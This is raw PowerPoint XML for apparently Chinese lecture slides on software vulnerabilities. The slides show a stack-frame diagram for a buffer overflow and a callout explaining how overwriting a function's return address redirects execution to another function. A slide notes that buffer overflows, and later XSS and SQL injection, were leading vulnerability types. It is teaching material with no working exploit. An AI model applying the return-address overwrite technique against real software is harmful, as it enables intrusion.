      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 4">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4356100" y="981075"/>
            <a:ext cx="3959225" cy="1225550"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -10282"/>
              <a:gd name="adj2" fmla="val 91583"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>BFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>的地址替换正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>AFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>返回地址，使程序运行至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>BFunc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 39940"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5073650" y="1087438"/>
            <a:ext cx="3416300" cy="5400675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3415805" cy="5400774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49159" name="Rectangle 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="99"/>
              <a:ext cx="1511300" cy="540067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160" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="3600549"/>
              <a:ext cx="1511300" cy="287338"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49161" name="组合 39943"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="2520280"/>
              <a:ext cx="1352550" cy="369887"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="852" cy="233"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49180" name="Line 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="655" y="136"/>
                <a:ext cx="197" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49181" name="Text Box 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="708" cy="233"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F79646"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>当前</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F79646"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>EBP</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49162" name="组合 39946"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="31749" y="0"/>
              <a:ext cx="1314449" cy="369888"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="828" cy="233"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49178" name="Line 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="635" y="132"/>
                <a:ext cx="193" cy="4"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49179" name="Text Box 9"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="700" cy="233"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F79646"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>当前</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F79646"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>ESP</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49163" name="Rectangle 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="3311624"/>
              <a:ext cx="1511300" cy="287338"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49164" name="Rectangle 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="3024287"/>
              <a:ext cx="1511300" cy="287337"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49165" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="2736949"/>
              <a:ext cx="1511300" cy="287338"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49166" name="Rectangle 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="215999"/>
              <a:ext cx="1511300" cy="863600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>EDI</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>ESI</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>EBX</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49167" name="Rectangle 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="2449612"/>
              <a:ext cx="1511300" cy="287337"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>m=3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49168" name="Rectangle 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328367" y="2160687"/>
              <a:ext cx="1511300" cy="287337"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>n=4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49169" name="Rectangle 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1327573" y="1584176"/>
              <a:ext cx="1511300" cy="575369"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
                <a:t>szBuf[8]</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49170" name="右大括号 29"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2839625" y="1584354"/>
              <a:ext cx="144442" cy="576274"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8219"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49171" name="右大括号 30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2839625" y="2160628"/>
              <a:ext cx="144442" cy="287342"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8280"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49172" name="右大括号 31"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2839625" y="2447970"/>
              <a:ext cx="144442" cy="288930"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8279"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49173" name="右大括号 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2839625" y="2736900"/>
              <a:ext cx="144442" cy="287343"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8280"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49174" name="矩形 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2911053" y="1655793"/>
              <a:ext cx="504752" cy="431808"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>8B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49175" name="矩形 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2911053" y="2087601"/>
              <a:ext cx="504752" cy="433395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49176" name="矩形 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2911053" y="2376532"/>
              <a:ext cx="504752" cy="431808"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49177" name="矩形 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2911053" y="2663874"/>
              <a:ext cx="504752" cy="431808"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri"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软件漏洞概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="1125538"/>
            <a:ext cx="6018212" cy="755650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2001-2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，缓冲区溢出漏洞为第一</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
